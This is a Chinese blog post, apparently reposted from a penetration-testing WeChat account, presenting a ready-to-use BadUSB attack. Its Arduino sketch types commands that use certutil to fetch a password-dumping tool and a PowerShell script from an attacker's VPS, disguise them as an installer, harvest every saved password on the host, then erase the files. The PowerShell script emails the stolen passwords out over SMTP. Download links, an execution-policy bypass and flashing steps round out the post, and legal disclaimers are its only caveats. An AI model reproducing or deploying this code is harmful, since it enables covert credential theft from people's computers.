月黑风高逛FreeBuf看到前两年写的文章被下架了,下架原因"内容敏感请补充防护建议"想了想把它搬过来吧,记录一下曾经,不喜勿喷,大佬轻喷。
涉及工具
Arduino IDE(烧录工具)
BadUsB(实体设备)
LaZagne(主机密码获取工具)
PowerShell(系统自带)
邮箱的授权码(外连接收)
工具获取方式
工具:https://www.lanzoue.com/b0hc1t00f密码:1t5f
https://github.com/Axx8/GetPass
前言
中心思想:目标主机插入BadUsB设备自动获取到当前的所有密码写到文件然后发送到邮箱中。
世界上最邪恶的USB设备
我这个小菜鸡大致理解如下:
设备名称叫BadUsB,它不同于U盘里携带的病毒,严格来说BadUsB不算是U盘,它也不提供存储的功能。但是正因为它将恶意代码置于硬件中,使得杀毒软件以及U盘格式化等防范措施都对它无效。
这里就放大佬总结的BadUSB详细介绍:https://www.baidu.com/baidu?ie=utf-8&wd=BadUSB%E8%AF%A6%E7%BB%86%E4%BB%8B%E7%BB%8D
演示
此处演示本来录的视频来自,由于部分敏感信息限制,这里直接放运行过程截图了。
查看邮件
仅用于技术交流,请勿用于非法用途。
代码在下方!!!!!!!
自动获取目标主机所有密码的脚本GetPass.ino
#include<Keyboard.h>void setup(){Keyboard.begin();//初始化键盘通讯delay(5000);//延时Keyboard.press(KEY_LEFT_GUI);//win键Keyboard.press('r');//r键delay(500);Keyboard.release(KEY_LEFT_GUI);Keyboard.release('r');Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法Keyboard.release(KEY_CAPS_LOCK);delay(500);Keyboard.println("CMD");delay(1000);Keyboard.println("certutil -urlcache -split -f http:<YOU VPS>/KissGeek/PASSTOOLS.EXE d:\setup_11.5.0.exe");//下载密码截取工具,因为开启了大小写混淆所以说这里要大写delay(10000);Keyboard.println("certutil -urlcache -split -f http:<YOU VPS>/KissGeek/PassUp.PS1 d:\setup_11.5.0.PS1");//下载powershell脚本delay(1000);Keyboard.println("d:\SETUP_11.5.0.EXE ALL > d:\pass.txt");//获取的密码放到pass.txtdelay(500);Keyboard.println("POWERSHELL d:\SETUP_11.5.0.PS1");Keyboard.println("DEL d:\pass.txt,d:\setup_11.5.0.PS1,d:\setup_11.5.0.exe");//删除程序Keyboard.println("EXIT");//退出powershellKeyboard.println("EXIT");//退出cmdKeyboard.press(KEY_CAPS_LOCK);Keyboard.release(KEY_CAPS_LOCK);Keyboard.end();//结束键盘通讯}void loop() {}
把获取到的密码发送到邮箱的脚本 PassUP.ps1(PowerShell)
$SMTPServer = 'smtp.qq.com'$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)$SMTPInfo.EnableSsl = $true$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('你的邮箱', '邮箱密钥');$ReportEmail = New-Object System.Net.Mail.MailMessage$ReportEmail.From = '你的邮箱'$ReportEmail.To.Add('你的邮箱')$ReportEmail.Subject = 'GetPass'$ReportEmail.Body = 'Passwords In Applications'$ReportEmail.Attachments.Add('F:pass.txt')$SMTPInfo.Send($ReportEmail)attrib +h pass.txt
无法运行ps1脚本时需要管理员方式运行powershell然后输入:
set-ExecutionPolicy RemoteSigned烧录软件
这里使用的是:Arduino IDE 1.8.12(可以使用最新版)
https://www.arduino.cn/thread-5838-1-1.html
安装完成后,打开Arduino IDE 选择“工具”-->"开发板"-->"Arduino Leonaedo",选择BadUsB设备的"端口"
烧录前选择好自己的板和端口,点击左上角的✔ 验证代码的完整性可用性,点击旁边的上传按钮将代码烧录到BadUsB设备。
烧录完成后当目标主机插入后自动运行BadUsB设备里的脚本。
该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果。
原文始发于微信公众号(渗透测试):BadUsB自动下载“脚本”获取本地所有密*码并发送到邮箱,文末送BadUsB设备!!!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论